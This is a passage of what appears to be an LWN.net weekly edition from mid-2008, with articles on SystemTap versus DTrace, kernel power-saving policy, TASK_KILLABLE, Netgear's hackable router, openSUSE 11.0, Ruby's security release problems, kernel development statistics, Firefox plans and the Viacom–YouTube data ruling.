add the tapsets that would make it more usable for system administrators
and others who have some general kernel knowledge but not enough to
sensibly instrument it.  For people using distribution kernels—at least
for the enterprise distributions and Fedora—it is only somewhat
painful to 
get SystemTap up and running.  But kernel hackers tend to run their own
kernels, often many different versions in a short period of time, so they
need to be able to be easily build one that works with SystemTap and
includes all of the 
debugging information that it requires.


SystemTap developer Frank
Ch. Eigler has a long
reply to many of the complaints in the thread.  It seems clear that the
SystemTap folks and the kernel hackers have not been
communicating—there are solutions to many of the problems that were
cited.  They 
are in various states of readiness, but are mostly
working.  So SystemTap is most of the way there for kernel tracing as
long as you are well-versed in kernel internals, but that has been true for
some time.


In order to get SystemTap to where it needs to be, the kernel hackers need
to be involved.  Building the infrastructure and waiting for tapsets to
magically appear is not a recipe for success.  The SystemTap hackers need
to be engaging the kernel community, as well as distributions, to make the
tool into something that gets used.


SystemTap can use static probe points, kernel markers—merged
into 2.6.24—but it is notable that no one has, as yet, made use of them.
A concerted effort needs to be made to make the tool more usable for the
kernel developers who can, in turn, help make it more usable for others.
There is a clear problem when folks like Ts'o regularly try, but find
it too difficult to be useful:

But maybe as more people try using it, they'll discover some of these
rough edges, and will start trying to fix it.  Every couple of months,
I've tried using it, and because it [h]as so many rough edges, I've
normally found it less work to debug the kernel using manual methods
rather trying to make Systemtap work on my system and with my kernel
development workflow.


It is a commonly heard complaint that while SystemTap is difficult to use,
DTrace "just works" for Solaris; Eigler responds:

Yeah, so I hear, but think about how different their target
environment is.  Their kernel hardly changes (several fixed APIs,
ABIs): this has huge implications.  Their kernel was willing to
insert probes (~ markers), a bunch of build system changes (debug
info subset transcribing).  Here in linux land, we suffer
multifaceted tensions and it is hard to go toward a goal without
obstructions (well-meaning as they may be).

A bunch of third-party scripts are often conflated with "dtrace",
which is just a matter of growing the user community enough, and
giving them a good tool to build on top of.  A growing set of
runnable end-user scripts is already packaged with systemtap,
intended for use by nonexperts, more help (e.g. concise problem
statements about what you'd like to measure/see) would be welcome.


Many administrators and other users of tracing facilities are not
necessarily interested in kernel-level tracing, but would really like to 
be able to use the instrumented versions of things like PostgreSQL.
That is in the plan according to Eigler: "We aim to piggyback on these efforts by reusing the dtrace
instrumentation calls embedded into postgres etc., if at all
possible."


Until the rough edges can be smoothed on the kernel side, 
Bottomley wonders
if it even makes sense to start considering user space:

Although there are
differing opinions about what systemtap could and should do, it's clear
that it's not working incredibly well for its design space: the kernel,
so talking about extending it to userspace is a premature.


DTrace sounds like a nice working solution that has many uses and many
happy users.  If one can ignore the self-congratulatory postings from its
lead developer, it might be worth having in Linux, but that simply is
not going to happen.  Paul Fox is working
on a port of DTrace to Linux, but that ignores the licensing realities
that would never allow it to become part of Linux.  It also ignores the
difficult path a DTrace port would face getting merged
into the mainline.  (We hope to have an article from Mr. Fox on his DTrace
porting work soon, stay tuned).


For all of the talk out of Sun about how they would love to make DTrace a
part of Linux, they clearly made a choice to ensure that could not happen.
Even if any technical barriers were lifted, the CDDL is not compatible with
the GPL.  It is 
perfectly fine as a free software license, but if you wish to get things
into Linux, they must be licensed in a GPL-compatible way.  This was well
understood at the time Sun freed Solaris, so this must have been a
conscious decision.  Given how much their marketing organization likes to
tout DTrace, 
it would seem to be a choice that Sun is quite happy with.


Linux will eventually get the tracing support it needs, in a way that is
easily accessible to users, but it may take some time.
Conversations like the recent one on ksummit-2008-discuss are an important
part of getting there.  It would appear that better
support for the use cases of kernel developers will be forthcoming.  It is
mostly a 
matter of documentation along with simplifying some of the building and
installation issues.  Once the kernel hackers actually start using it,
progress is likely to be fairly swift.


This is the
way free software development works; it generally does not track a straight
path to a solution, but often wanders about in the solution space for a
while.  It is highly unlikely that a development like DTrace could have
come about in the way that it did in a true community-developed
operating system.  For that you need everyone pulling in the same exact
direction, which may be why Sun is reluctant to turn over much of the
governance of Solaris to the community.  That may help them develop things
more quickly, because there will be fewer barriers, but it won't help them to
foster the kind of development community that characterizes Linux.


		Making power policy just work


The sched_mc_power_savings parameter (cleverly hidden under
/sys/devices/system/cpu) was introduced in the 2.6.18 kernel.  If
this parameter is set to one (the default is zero), it changes the scheduler
load balancing code in an interesting way: it makes an ongoing effort to
gather together processes on the smallest number of CPUs.  If the system is
not heavily loaded, this policy will result in some processors being
entirely idle; those processors can then be put into a deep sleep and left
there for some time.  And that, of course, results in lower power
consumption, which is a good thing.


Vaidyanathan Srinivasan recently noted that, while this policy
works well in a number of situations, there are others where things could
be better.  The sched_mc_power_savings policy is relatively conservative in
how it loads processes onto CPUs, taking care to not overload those CPUs
and create excessive latency for applications.  As a result, the workload
on a large system can still end up spread out more widely than might be
optimal, especially if the workload is bursty.  In response, Vaidyanathan
suggests making the power savings policy more flexible, with the system
administrator being able to select a combination of power savings and
latency which works well for the workload.  On systems where power savings
matters a lot, a more aggressive mode (which would pack processes more
tightly into CPUs) could be chosen.


This suggestion was controversial.  Nobody disputes the idea that
smarter power savings policy would be a good idea.  But there is resistance
to the idea of creating more tuning knobs to control this policy; instead,
it is felt, the kernel should work out the optimal policy on its own.  As
Andi Kleen puts it:


	Tunables are basically "we give up, let's push the problem to the
	user" which is not nice. I suspect a lot of users won't even know
	if their workloads are bursty or not.  Or they might have workloads
	which are both bursty and not bursty.


There are a couple of answers to that objection.  One is that the system
cannot know, on its own, what priorities the users and/or administrators
have.  Those priorities could even change over time, with performance being
emphasized during peak times and low power usage otherwise.  Additionally,
not all users see "performance" the same way; some want responsiveness and
low latency, while others place a higher priority on throughput.  If the
system cannot simultaneously optimize all of those parameters, it will need
guidance from somewhere to choose the best policy.

And that's where the other answer comes in: that guidance could come from
user space.  Special-purpose software running on large installations can
monitor the performance of important applications and adjust resources (and
policies) to get the desired results.  Or, in a somewhat different vision,
individual applications could register their performance needs and expected
behavior.  In this case, the kernel is charged with somehow mediating
between applications with different expectations and coming up with a
reasonable set of policies.

In the middle of all this, it was pointed out that a mechanism by which
expectations can be communicated to the kernel already exists: the nice
level (priority) associated with each process.  In a simple view of the
world, a process's nice level would tell the kernel how to manage it with
regard to power savings; on a system with a number of niced processes,
those processes would be gathered onto a subset of processors during period
of relatively low activity.  In essence, this policy says that it is not
worthwhile to power up more processors just to give better throughput to
low-priority processes.

It does not take long, though, to come up with situations where the use of
nice levels leads to the wrong sort of results.  Peter Zijlstra observed that he has niced processes (created
with distcc) which should have access to all of the CPU power available,
but which should not contend with interactive processes on the same
system.  In such cases, those processes should have a high nice value with
regard to CPU usage, but that should not interfere with their ability to
move onto idle CPUs, if any exist.  So the answer may take the form of a
separate "powernice" command which would regulate a process's priority when
it comes to causing the system to draw more power.

Nice levels may (or may not) prove to be sufficient information to let the
system choose an optimal power policy.  But it will be some time before
anybody really knows that; work on optimizing power usage - especially on
server systems - is not in an advanced state.  So pressure to add tuning
knobs for power policies may continue, for one simple reason: people want
ways of experimenting with different policies and seeing what the results
are.  Until we really know what the effects of different policies are - on
both power usage and system performance - it will be hard to build a system
which can choose an optimal policy on its own.

		Netgear's open router


Your editor was recently reminiscing about an early stage of his career,
which involved the administration of a VAX 11/780 computer.  The VAX was a
highly successful product, as was its native operating system VMS.  Quite a
few VAX customers chose to do without VMS, though, and put early versions
of BSD Unix on them instead.  Digital Equipment Corporation never entirely
appreciated those customers.  To DEC, every BSD installation looked like a
lost VMS service contract.  

The company should, instead, have seen those installations as an extra sale
gained as a result of the VAX's ability to run a nice operating system.

Almost 30 years later, some parts of the computing industry have come to
understand that there is value in selling hardware which can run operating
systems provided by others.  Microsoft made that point in a big way, of
course, but there are also significant parts of the industry which benefit
from making systems which can run Linux - and, in particular, a version of
Linux which is not necessarily supplied by the vendor.  


But other sectors still seem to see the ability for the customer to put (or
replace) Linux on their systems the way DEC saw Unix in the early 1980's.
They see no value in letting their customers make changes to their systems,
choosing instead to lock those systems down and keep total control.
Embedded systems are often singled out as an example of this type of
behavior, and vendors of small routers tend to be especially inclined in
this way.  It is not a coincidence that a substantial portion of the
high-profile GPL-enforcement cases to date have involved consumer-level
routers.


Some vendors, at least, are getting smarter and doing what they need to do
to avoid licensing problems.  But relatively few of them welcome customers
who want 
to replace the software on "their" devices.  There are exceptions, though,
and their number just grew with this announcement from Netgear.
The WGR614L router looks like a fairly straightforward consumer wireless
router, with the usual set of features.  LWN readers will doubtless be glad
to hear that it is "Works with Windows Vista" certified.  It has a
four-port Ethernet switch, an 802.11g access point, and  a mighty
240 MHz CPU and 16MB of RAM.  All of the stuff one would expect from
an inexpensive desktop device.


But what makes this device interesting is that it's designed to be open and
hackable.  The source code for the factory-installed firmware is available
from Netgear's community web
site; it's amusingly packaged as a zip file containing a single,
compressed tarball which, in turn, holds a bleeding-edge 2.4.20 kernel
tree.  But anybody wanting something a bit more contemporary and
community-oriented can replace that firmware altogether with a package like Tomato or DD-WRT; indeed, Netgear
almost seems to encourage its customers to do so.


Every one of those customers then gets the benefit of the effort which has
gone into the development of those router distributions - with little
effort required on Netgear's part.  Those customers can improve this
platform and make their changes available to other customers; that makes
Netgear's hardware more valuable.  If there are bugs in the system, a
single motivated customer can fix them and make those fixes available to
everybody else.  And all of this comes at almost no cost to Netgear.


It is always fun to see Linux turn up in new places.  It's now a routine
experience to realize that one's new television, camcorder, music player,
or automobile runs Linux.  But locked-down, Linux-based devices are not far
removed from the fully proprietary systems which preceded them.  Whether or
not one agrees that locking down systems in this way is legally or morally
defensible, it's easy to conclude that it is undesirable.  A Linux system
which is cast in concrete loses a part of the vital energy which makes
Linux what it is.


So it is always a welcome development when a vendor decides to take a more
open path.  With any luck at all, the wider public will eventually realize
that more open devices are more powerful devices, and, as a result, such
devices will prove more successful.  That is the path that brings us more
control over our systems and, eventually, to World Domination.

		A look at openSUSE 11.0


openSUSE 11.0 was released
about two weeks ago, to generally good reviews.  TuxMachines ran some lighthearted
tests last fall and again recently, comparing the latest Mandriva
release with the latest openSUSE release.  This time around openSUSE edged
out Mandriva in a near tie.  Other good reviews can be found on LinuxPlanet,
DownloadSquad
and many other places around the web.

There are plenty of options for getting a
hold of this release.  You can buy a boxed set, an option that has all but
disappeared from the Linux distribution scene.  The box comes with complete
end-user documentation, installable media for 32 Bit and 64 Bit systems,
plus 90 days of end-user installation support.

Most people will probably download the release in one form
or another.  Chose from the 32-bit, 64-bit or PowerPC platforms.  Get a
DVD, a Live CD or use a network install.  The live CD comes in a GNOME or a
KDE version.  There's plenty of documentation online to go along with that;
release
notes, the openSUSE
11.0 startup document and the step-by-step installation
guide.

The KDE live CD only contains KDE 4.  If you would prefer KDE 3.5, it is
available on the DVD or the network install.  Benjamin Weber has a blog post
on the inclusion of KDE4.  "There should be a KDE3.5 installable
livecd.  This was not produced as there were insufficient resources to
produce and test three installable livecds. Someone can always step up and
help produce one."

Xfce 4.4 is also available for those who want something lighter than
either GNOME or KDE.  Other applications available in this release include
Firefox 3.0, OpenOffice.org 2.4, Banshee 1.0 and Wine 1.0.  KIWI LTSP is
the LTSP5 implementation on openSUSE.  The previous openSUSE release added
Giver, an easy GTK+ file-sharing tool.  This release includes Kepas, a KDE
application for file-sharing.

Underneath all that you'll find Linux 2.6.25.4, AppArmor 2.3, Xen 3.2.1
RC1, Alsa 1.0.16, glibc 2.8 branch, binutils 2.18.50 SVN, cmake 2.6, gcc
4.3 branch, gdb 6.8, Perl 5.10, ConsoleKit 0.2.10, CUPS 1.3.7, D-Bus 1.2.1,
NetworkManager 0.7 SVN, PackageKit 0.2.1, PolicyKit 0.7, PulseAudio 0.9.10,
Samba 3.2pre2 and X.org 7.3.  These and other highlights are listed here.

Those familiar to openSUSE will notice that the installer and the package
management have been overhauled for this release.  Also NetworkManager has
been improved and should autodetect an EVDO card without any major
problems.

Of course it's impossible to squash all bugs, but the Most Annoying
Bugs 11.0 list is quite short and most have workarounds.

All in all, this looks like a great release for openSUSE.

		TASK_KILLABLE


Like most versions of Unix, Linux has two fundamental ways in which a
process can be put to sleep.  A process which is placed in the
TASK_INTERRUPTIBLE state will sleep until either
(1) something explicitly wakes it up, or (2) a non-masked signal
is received.  The TASK_UNINTERRUPTIBLE state, instead, ignores
signals; processes in that state will require an explicit wakeup before
they can run again.


There are advantages and disadvantages to each type of sleep.
Interruptible sleeps enable faster response to signals, but they make the
programming harder.  Kernel code which uses interruptible sleeps must
always check to see whether it woke up as a result of a signal, and, if so,
clean up whatever it was doing and return -EINTR back to user
space.  The user-space side, too, must realize that a system call was
interrupted and respond accordingly; not all user-space programmers are
known for their diligence in this regard.  Making a sleep uninterruptible
eliminates these problems, but at the cost of being, well,
uninterruptible.  If the expected wakeup event does not materialize, the
process will wait forever and there is usually nothing that anybody can do
about it short of rebooting the system.  This is the source of the dreaded,
unkillable process which is shown to be in the "D" state by ps.


Given the highly obnoxious nature of unkillable processes, one would think
that interruptible sleeps should be used whenever possible.  The problem
with that idea is that, in many cases, the introduction of interruptible
sleeps is likely to lead to application bugs.  As recently noted by Alan Cox:


	Unix tradition (and thus almost all applications) believe file
	store writes to be non signal interruptible. It would not be safe
	or practical to change that guarantee.


So it would seem that we are stuck with the occasional blocked-and-immortal
process forever.

Or maybe not.  A while back, Matthew Wilcox realized that many of these
concerns about application bugs do not really apply if the application is
about to be killed anyway.  It does not matter if the developer thought
about the possibility of an interrupted system call if said system call is
doomed to never return to user space.  So Matthew created a new sleeping
state, called TASK_KILLABLE; it behaves like
TASK_UNINTERRUPTIBLE with the exception that fatal signals will
interrupt the sleep.

With TASK_KILLABLE comes a new set of primitives for waiting for
events and acquiring locks:


For each of these functions, the return value will be zero for a normal,
successful return, or a negative error code in case of a fatal signal.  In
the latter case, kernel code should clean up and return, enabling the
process to be killed.

The TASK_KILLABLE patch was merged for the 2.6.25 kernel, but that
does not mean that the unkillable process problem has gone away.  The
number of places in the kernel (as of 2.6.26-rc8) which are actually using
this new state is quite small - as in, one need not worry about running out
of fingers while counting them.  The NFS client code has been converted,
which can only be a welcome development.  But there are very few other
uses of TASK_KILLABLE, and none at all in device drivers, which is
often where processes get wedged.

It can take time for a new API to enter widespread use in the kernel,
especially when it supplements an existing functionality which works well
enough most of the time.  Additionally, the benefits of a mass conversion
of existing code to killable sleeps are not entirely clear.  But there are
almost certainly places in the kernel which could be improved by this
change, if users and developers could identify the spots where processes
get hung.  It also makes sense to use killable sleeps in new code unless
there is some pressing reason to disallow interruptions altogether.

		The OLPC project releases 10GB of sound samples


The One Laptop Per Child project
recently released a large collection of
sound samples:


Loops, Grooves, Licks, Stings, Hits, Pads, Melodic Motives/Themes/Phrases, Sound-Effects, City and Country Soundscapes, Motors, Machines, Toys, Guns, Explosions, Swords, Armor, Cars, Jets, Pot &amp; Pans, Acoustic and Synthetic Noises, Acoustic and Electronic Drums, Voices, Western and World Instruments, Real and Human Animals, Industrial and Natural Ambiences, Film and Game Foley, and more, more, more! This huge collection of new and original samples have been donated to Dr. Richard Boulanger @ cSounds.com specifically to support the OLPC developers, students, XO users, and computer and electronic musicians everywhere. They are FREE and are offered under a CC-BY license for downloading and use in your teaching, your demos, your research, your music, your remixes, your songs, your games, your videos, your slideshows, your websites, and your XO activities.


The sample collection comes from a number of sources including the
Open Path Music
recording label,
Zenph Studios
(a musical software company), the
Berklee College of Music,
the

Berklee Music Synthesis Alumni,
Berklee Shares.com,
the Worldwide Community of Csound Developers, Teachers and Users
and
Dr. Richard Boulanger.


The sample collection is somewhat random in nature, there are
similarities in the material from the various sources such as many
single notes from common musical instruments.
The recording quality tends to be decent, although a percentage of the
sound samples have audible hum, hiss, aliasing issues and
rough beginnings or endings.
All of the samples are recorded in mono and are available in
several sample rates.  The samples have also had their volumes
normalized.
An obvious improvement to the collection would involve compressing
the samples with FLAC
to save disk space.
The majority of the samples have durations of a few seconds or less,
there are a number of long selections from long ambient
recordings or groupings of short sounds.


The sound descriptions for the various collections are somewhat
generic, the best way to get a good understanding of the entire library is
to download a group of sub-collections and play through the various
sounds.  Having a few gigabytes of empty disk space is a good idea.
Unleashing a random audio file player on the collection
can be amusing, if somewhat annoying after a while.
Your editor listened to a random selection from the first seven
sections from the Berklee College of Music Sampling Archive,
the collection is quite diverse.


One can imagine a number of possible uses for such a large library of
sounds.  Adding audio to games is an obvious use for the sounds.
One could create accessibility applications for the visually impaired.
In keeping with the OLPC theme, a teacher could sort through the
sounds and use them for educating children about animals, musical
instruments and other things that they may not experience in daily life.
On the artistic side, the samples could be put to good use making
audio tracks and movies.  With the appropriate sample playing
software, new and interesting musical instruments could be created.


If your software project has a need for some open-licensed audio
clips, the OLPC collection is a good source.  Producing
a large collection of sounds such as this would involve many
hours of work.


		Ruby security flaws expose release process problems


Some serious integer overflows in the Ruby language were recently
discovered and fixed, but the process has left some in the community
unhappy about how it was done.  One of the biggest problems was that the
official patched versions of the language broke its signature application:
Rails.  The overflows may lead to arbitrary code execution which left
some users in a quandary, trying to decide whether to close known holes in
the language or to keep their web applications running.


There still seems to be some question about whether the holes are
exploitable or not, but one thing is abundantly clear: they were fixed in
the public CVS several days before any kind of security announcement was
made.  It was made worse by referring to the CVE numbers in the commit
message.  For anyone looking for a possibly exploitable Ruby flaw—one
that had yet to be publicly announced—that would be a glaringly
obvious place to start.


When a release and announcement
went out, some of the versions specified would cause Rails, the web
application framework, to segfault.  No new updates have been posted to the
Ruby language web site leaving
distributions and users to fill in the gap.  Some frantic scrambling can be
seen on a thread on
the ruby-talk mailing list as folks with production Rails applications cast
about for solutions.


Part of the problem may stem from the number of separate language versions
the Ruby team is trying to support.  Three stable versions (1.8.5, 1.8.6,
and 1.8.7) as well as one development version (1.9.0) are all affected by
these vulnerabilities.  Unfortunately, all four of the updated packages had
one or more problems that either didn't fix all of the vulnerabilities or
broke Rails.  Those are still the versions suggested as a fix as of this
writing. 


The new versions were based on the latest code in the CVS tree which
evidently had not been tested completely.  There are several test suites
available for Ruby and Rails that would have caught these problems, but
they apparently were not run.  It is certainly important to get security
fixes out quickly, but introducing other vulnerabilities and/or
incompatibilities with existing code is a rather high price to pay.
As is waiting ten (and counting...) days for a proper fix from upstream.


For the most part, Linux distributions have resolved the problem for
themselves by either backporting the fixes into the version they already
support or by fixing the updated version provided.  For example, Fedora 9
has done three separate releases to fully resolve the problem, the first to
upgrade to the suggested upstream version (1.8.6p230), a second to resolve
a segfault introduced somewhere between p114 and p230, and a third to
handle the problem of Rails being broken.


There is some indication that the Ruby team does not consider the flaws to
be exploitable for code execution but, if so, they are still clearly
denial-of-service vulnerabilities.  The continued silence, at least on the
official website, should also give one pause.  The release process for Ruby
seems to have fairly serious holes in it.  This has caused some to issue a plea for a release
process on the ruby-core mailing list. 


In addition, Dominique Brezinski claims that these bugs or some that were
closely related were disclosed
several years ago (see comment 43) and essentially ignored at that
time.  This is disconcerting for a language that is being increasingly used
in web applications and other internet-facing services.  One can only hope
that this incident will serve as a wake up call to the Ruby developers.
Failing that, if additional incidents like this occur, it may instead serve
as a wake up call for those who depend on Ruby.


		Some development statistics for 2.6.26 - and beyond


When 2.6.26-rc1 was released, your editor noted that, at a mere 7500
commits, it looked like 2.6.26 would be a smaller than usual development
cycle.  Interestingly, though, 2.6.26 has caught up.  As of this writing
(waiting for 2.6.26-rc9), this development cycle has incorporated 10,102
changesets for a net addition of 169,439 lines of code to the kernel.  That
makes it still significantly smaller than 2.6.25, but it is, by no means
small.  The developer base remains as broad as ever: 1065 developers
(representing some 150 companies) have contributed to 2.6.26; just over 1/3
of those developers contributed one single changeset.

The 2.6 development model says that the bulk of the changes should be
merged during the merge window (before the -rc1 release), with only fixes
coming thereafter.  Here's how things break down for recent releases:


So, while the bulk of the big patches enter the kernel during the merge
window, at least 25% of the total - and often more - come thereafter.
That's a lot of fixes. 


So who were the most active developers this time around?  Here's the top
20:


In terms of the number of changesets merged, Harvey Harrison got to the
top of the list with a wide variety of of janitorial fixes.  Bartlomiej
Zolnierkiewicz continues to put significant effort into cleaning up the IDE
subsystem, even though most distributors have moved away from that code and
are using the newer PATA layer instead.  Glauber Costa has been tirelessly
working in the x86 architecture code; in particular, he continues to work
toward the goal of unifying the 32-bit and 64-bit code to the greatest
extent possible.  Adrian Bunk has made a career of cleaning up the code
base and eliminating unneeded code.  And Joe Perches dedicated much time to
eliminating warnings from the checkpatch.pl script.

There have been complaints from the developers that the volume of "cleanup"
patches is reaching a point that it is drowning out the rest and
interfering with "real work."  We're seeing some of that volume here, with
three of the top five changeset contributors doing cleanup work - some of
which is seen to be more valuable than the rest.

On the lines changed side, we see a mostly different set of developers.  In
this case, the top slots were earned by deleting code.  Stephen Hemminger
finally succeeded in getting rid of the old sk98lin driver.  Adrian Bunk
tore out the bcm43xx driver, the ieee80311 software MAC layer, the
xircom_tulip_cb driver, and various other bits and pieces.  David Miller
removed a bunch of old SPARC code, but replaced it with various other
facilities; he also took the PowerPC low-level memory manager and made it
generic.  Steven Toth works in the Video4Linux layer; he added some new
drivers and a bunch of cleanups.  Ben Hutchings added the Solarstorm
SFC4000 driver.


When one thinks about 2.6.26 features, the things that come to mind include
KGDB, almost-ready network namespaces, almost-ready mesh networking
support, a working (shall we say "almost ready"?) realtime group scheduler,
read-only bind mounts, page 
attribute table support, the object debugging infrastructure, and, of
course, the vast pile of new drivers.  One has to look hard to find the
developers behind that work in the lists above (some of them are certainly
there).  Which just reinforces an important point: there is interest and
information in counting changesets and lines changed, but the correlation
between those numbers and serious accomplishments in kernel programming is
weak at best.  Unfortunately, "real work" is awfully hard to measure in any
sort of automated way.


So what the heck; we'll go back to the numbers we can measure.  Here's the
most active companies for 2.6.26:


This list tends not to change too much from one release to the next; in
particular, the top companies are always the same.  


If we look at who is attaching Signed-off-by tags to code they didn't
write, we get a sense for who the gatekeepers to the kernel are.  These are
the developers and companies who are herding code into the mainline:


Once again, these numbers tend not to change that much from one development
cycle to the next.  Subsystem maintainers do not change often.


What's next?

This is the first full development cycle where the linux-next tree was in
operation.  At this stage in the cycle, linux-next should look very much
like 2.6.27 - or, at least, 2.6.27-rc1.  Your editor pulled the July 2
linux-next tree and ran some statistics; this tree contains 6527 changesets
from 619 developers.  Just over 400,000 lines of code are touched, with a
net addition of 38,000 lines.


If linux-next is to be believed, the most active 2.6.27 developers will be:


These numbers reflect a number of the larger developments which can be
expected for 2.6.27: incredible amounts of KVM work, the merging of the
UBIFS filesystem, the ftrace tracing framework, a lot of reworking of the
TTY layer, a lot of firmware thrashing, and ongoing big kernel lock removal
work.


It will be most interesting to see how these numbers compare with what
actually shows up in 2.6.27-rc1.  Recent numbers suggest that quite a few
patches will hit the mainline without having been in the linux-next tree -
either that, or 2.6.27 will be a relatively small release.  If nothing
else, we will see which developers do not yet get their work into
linux-next for integration testing ahead of the merge window.

		Mozilla plans for Firefox 3 and beyond


The gift wrap is scarcely off Firefox 3 and the Mozilla community is
already looking toward its next update. The first alpha release
of Firefox 3.1, codenamed Shiretoko, may be released as early as this
month, while its final release might see the light of day by year's
end. Let's take a look at where this popular Internet browser is headed in
the coming months, and what new features users can expect to see.
Several features were nearly included for Firefox 3.0 but didn't make
the cut because they weren't completely ready. New
features expected to be in version 3.1 include a history and bookmark
organizer with unified search and smart folder capabilities, and visual tab
switching that shows thumbnail images of the web sites opened in each tab
when moused over, both of which were abandoned in lieu of other, more
critical features.
According to an email
sent to the mozilla.dev.planning mailing list, Mozilla's Vice President of
Engineering, Mike Schroepfer, says there are other features expected to
make it into version 3.1. For instance, native JSON DOM bindings (preferred
by web developers over its JavaScript counterparts), an improved
Awesomebar, support for cross-site XMLHttpRequest for the development of
more powerful web 
applications, 
and better system integration are a few of the features Mozilla is anxious
to get into the hands of users. 
Schroepfer says, "This, along with the overall quality of Gecko 1.9 as a
basis for mobile and the desire to get new platform features out to web
developers sooner has [led us] to want to do a second release of Firefox
this year."
In the event a feature isn't ready for version 3.1's targeted ship date,
Schroepfer says rather than hold the release, it will simply be included in
the next major release instead.
In a recent blog
post, Schroepfer says the new decision to aim for shorter, date-driven
release cycles is in large part due to Mozilla's desire to "deliver
releases of the quality and impact of Firefox 3 with much greater
frequency." More frequent indeed; the gap between the release of Firefox
2.0 and 3.0 was almost two years.
Not surprisingly, Firefox 4 is expected to usher in a whole host of
changes, not the least of which is the introduction
of Mozilla2, "an extensive update to the Mozilla platform to feature
highlights like ActionMonkey, the merge of Mozilla's JavaScript engine
(SpiderMonkey) and Tamarin, Adobe's JavaScript virtual machine open-sourced
in late 2006."
Details of the features expected to ship with Firefox 4 are sketchy, but
the Vice President of Mozilla Labs, Chris Beard, has two projects currently
under development that he'd like to see
included: Weave and Prism.
Weave is similar
to the wildly popular browser synchronization add-on, Foxmarks. While Foxmarks only syncs an
individual's bookmarks across machines, Weave's goal is to replicate a
user's entire browsing experience — including bookmarks, favorites,
passwords, and preferences — no matter where they access the
Internet.
Prism takes aim at
Google Gears by making browser
functionality available even while offline. Previously known as WebRunner,
Prism is based on an idea called site specific browsers (SSB) and is
already implemented in Fluid for Mac OS
X, Adobe Air, and Microsoft
Silverlight. Prism team member Matthew Gertner explains,
"Rather than running programs in normal web browsers like Firefox or
Safari, wedged in a tab between New York Times articles and TechCrunch
posts, each app is given its own dedicated browser, which is customized to
include many of the desktop features that users know and love." For a taste
of what Prism can do within Firefox 3, download this
extension.
Of course, one of the biggest questions on the minds of many people
these days is: what's up with the mobile version of Firefox? Although it
looks like there's a ways to go before Mobile Firefox turns up on your Razr
or BlackBerry, the rapid release cycle of Firefox will help push the
project along. Schroepfer says, "There are already devices shipping with
early versions of Gecko 1.9 at the core. More are coming soon and we'll be
releasing milestones of full branded versions of Firefox (with XUL and the
Firefox team taking a lead in the user experience) later this year. This
lines up well with Firefox 3.1 and a synchronized release schedule will
make everything run more smoothly."
The development team is working on sorting through some of the basic
differences among mobile devices such as a touch screen versus non-touch
screen interface, virtual versus tactile keyboards, and so on. If you're
interested in trying out the prototypes, they're available on the team's wiki page.
Firefox 3 has been downloaded more than 8
million times since its release on June 17th, and more than 90% of
users download the latest version of the browser within
7 days of its release. Clearly, Firefox has a large and growing user
base, no doubt due in large part to Mozilla's willingness to offer new and
useful features in a timely fashion.

		Notes on the Viacom ruling


Google's purchase of YouTube always seemed questionable to some observers:
it looked as if Google were buying itself a whole new source of copyright
lawsuits.  One of the benefits of that purchase came through on
July 2, when a U.S. District Court ordered Google to hand over its
complete set of YouTube traffic logs, containing information about every
video viewed on the service.  See
Groklaw for the full text of the order.  If this order stands (and it
appears that Google will not appeal it), millions
of users worldwide will have their viewing data handed over to a litigious
entertainment industry company.  There's a couple of important implications
to draw from this turn of events, so LWN will venture a little far afield
and take a look.


The data involved includes, for each video viewed, the time, which video
was involved, which YouTube user account was used, and the IP address the
request came from.  Viacom claimed that the privacy of YouTube users is not
threatened by this release of data, and the court agreed.  But account
names can be correlated across sites, and IP addresses (especially
time-correlated IP addresses) can easily identify exactly who was watching
a particular video.  Viacom promises it would never use this data to launch
enforcement actions against individuals; the fact that the company feels
the need to make that promise suggests that Viacom feels it could
use this data to that end.


One other interesting aspect of the ruling which has been commented upon
less is this: Google has also been ordered to hand over every video which
has been removed from the site.  Once again, that is a great deal of data.
It also drives home the point that, on a site like YouTube, nothing is
really removed: all of those "removed" videos are still there, waiting for
some company with enough lawyers to go after it.


All of this data is to be handed over regardless of what jurisdiction the
users thought they were in.  Nobody's privacy or data retention laws apply
here.  This is a worldwide compromise of personal data.


So lesson number one is obvious: attending to one's personal security
requires being very careful about the data tracks that one leaves on other
peoples' servers.  Regardless of any site's privacy policy or any country's
data sharing laws, that data is there for the grabbing.  The course of
events which led to the compromise of vast amounts of video-viewing data
can also lead to the disclosure of electronic mail, accounting data, online
chat sessions, purchase histories, software downloads, or which edgy Second
Life neighborhood one likes to hang out in.  Indeed, records of video
viewing activity are more strongly protected in the U.S. than many other
types of data; other types of information may well prove easier to get.
What we leave on remote
machines seems to stay there indefinitely, and it's an open book for those with
sufficient legal power on their side.


[PULL QUOTE: 
If you gather together that much
information on the behavior of many millions of people, somebody,
somewhere, is going to try to get their hands on it.  
 END QUOTE]


The second lesson is for anybody running a publicly-available server, as
many LWN readers do.  The video activity database being grabbed by Viacom
is said to be about 12 terabytes deep - before getting into the
"removed" videos.  It should not be surprising that a data stash of that
size would attract this kind of action.  If you gather together that much
information on the behavior of many millions of people, somebody,
somewhere, is going to try to get their hands on it.  How could it possibly
be any other way?


Not enough people are asking this question: why does Google/YouTube hold
that much data about its users?  Why does it retain the ability to replay
their actions years after the fact?  And why do "removed" videos not go
away?  If that data did not exist in the first place, there would be no
question of disclosing it to an attacking corporation.  A company which
keeps that amount of data around is prioritizing whatever commercial value
it sees in that data over the privacy and security of its users.  And, by
inviting raids from corporations (which we hear about) and governments
(which we might not hear about), such companies are not helping their own
security either.


So there are strong arguments for simply not retaining all that data in the
first place.  Naturally, some governments are doing their best to force
that kind of retention, but that's a different battle.  In the absence of
legal constraints, a standard policy mandating short data retention periods
makes a lot of sense.  It behooves all of
us to think about what kind of data we leave lying around - either through
our activities or by facilitating the activities of others - and to keep it
to a minimum.  The most secure data is data which does not exist.


		The current development kernel is...linux-next?


One of the development process advantages brought by git (and by BitKeeper
before it) is the ability to see the up-to-the-second, bleeding-edge status
of Linus's tree.  So any developer who wants to know where the front edge
of development lies can grab that tree and make patches fit into it.  But
the value of the mainline repository for development would appear to be
less than it once was.  The mainline is no longer where the action is.

Consider, for example, this response
from Andrew Morton after finding that a patch posted to linux-kernel
would not compile for him:


	I assume this patch was prepared against some ancient out-of-date
	kernel such as current Linus mainline.  Guys, we have a new
	development tree now.


He followed up with this statement:


	But what I am repeatedly seeing is people cheerfully raising 2.6.27
	patches against the 2.6.26 tree when we have a nice 2.6.27 tree for
	developing against.  Those days are over, guys.


So the message would appear to be clear: development work should be done
against the linux-next tree rather than against the mainline kernel.  There
are some clear advantages to having work done in this way.  Patches
developed against linux-next should merge cleanly during the next merge
